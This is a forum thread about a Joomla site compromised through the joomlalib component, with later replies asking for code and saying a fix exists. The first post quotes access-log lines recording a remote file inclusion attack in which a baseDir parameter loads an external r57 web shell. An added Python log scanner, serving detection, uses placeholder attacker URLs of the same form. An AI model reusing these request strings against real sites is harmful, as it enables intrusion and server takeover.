Thread: Joomlalib hacked

  1. #1
    Join Date
    May 2007
    Posts
    16

    Joomlalib hacked

    The site of a friend of mine was hacked recently through joomlalib 1.3.1beta, but what I see in the actual joomlalib could have the same problem!
    Code:
    ($baseDir = dirname(__FILE__) . '/';)
    ....
    Here is what I found in the access log:

    Code:
    203.151.217.29 - - [09/Oct/2007:02:56:45 +0200] "GET //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 12764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    203.151.217.29 - - [09/Oct/2007:02:56:58 +0200] "POST //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 15193 "http://foo.com//components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    203.151.217.29 - - [09/Oct/2007:02:57:21 +0200] "POST //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 15256 "http://foo.com//components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    203.151.217.29 - - [09/Oct/2007:02:58:17 +0200] "POST //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 12083 "http://foo.com//components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    203.151.217.29 - - [09/Oct/2007:02:58:30 +0200] "POST //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 12083 "http://foo.com//components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    203.151.217.29 - - [09/Oct/2007:02:58:44 +0200] "GET / HTTP/1.0" 200 1776 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    Last edited by dracula; 10-09-2007 at 11:45 AM.
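
Added example, not part of the original thread and not joomlalib code: a Python check that scans Apache combined-format access log lines for the pattern visible in the log above, a query parameter whose value is a remote URL. The sample lines, hostnames, component path and function name are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A decoded parameter value that *starts* with a remote scheme is the signal.
# Legitimate redirect/return parameters also match, so review hits by hand.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.I)

# Constructed sample lines (documentation IP ranges, placeholder hostnames).
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Oct/2007:02:56:45 +0200] "GET //components/com_example/standalone/stub.php?baseDir=http://attacker.example/shell.txt? HTTP/1.0" 200 12764 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [09/Oct/2007:02:56:58 +0200] "POST /components/com_example/standalone/stub.php?baseDir=http%3A%2F%2Fattacker.example%2Fshell.txt%3F HTTP/1.0" 404 512 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [09/Oct/2007:03:01:02 +0200] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 1776 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [09/Oct/2007:03:01:10 +0200] "GET /index.php?ref=docs/http://notes HTTP/1.1" 200 1776 "-" "Mozilla/4.0"',
]

def find_remote_include_hits(lines):
    """Return one dict per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        # Split by hand: a leading "//" in the path confuses URL parsers.
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes, so encoded "http%3A%2F%2F" is caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append({
                    "ip": m["ip"], "time": m["time"], "method": m["method"],
                    "path": path, "param": name, "value": value,
                    # 2xx: the script exists and answered, so triage these first
                    "answered": m["status"].startswith("2"),
                })
    return hits

if __name__ == "__main__":
    for hit in find_remote_include_hits(SAMPLE_LOG):
        flag = "ANSWERED" if hit["answered"] else "probe"
        print(f'{flag:8} {hit["ip"]} {hit["time"]} {hit["method"]} '
              f'{hit["path"]} {hit["param"]}={hit["value"]}')
```
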

  2. #2
    Join Date
    May 2006
    Location
    Nijmegen, The Netherlands
    Posts
    1,003

    Re: Joomlalib hacked

    Please post the complete code and not just that line, so I can compare it against the current version and/or see if there is indeed a security issue.

    Kind regards,
    Michiel

  3. #3
    Join Date
    May 2007
    Posts
    16

    Re: Joomlalib hacked

    I think this was solved. There was a post on the joomla forum.
    So the new version should be safe again.
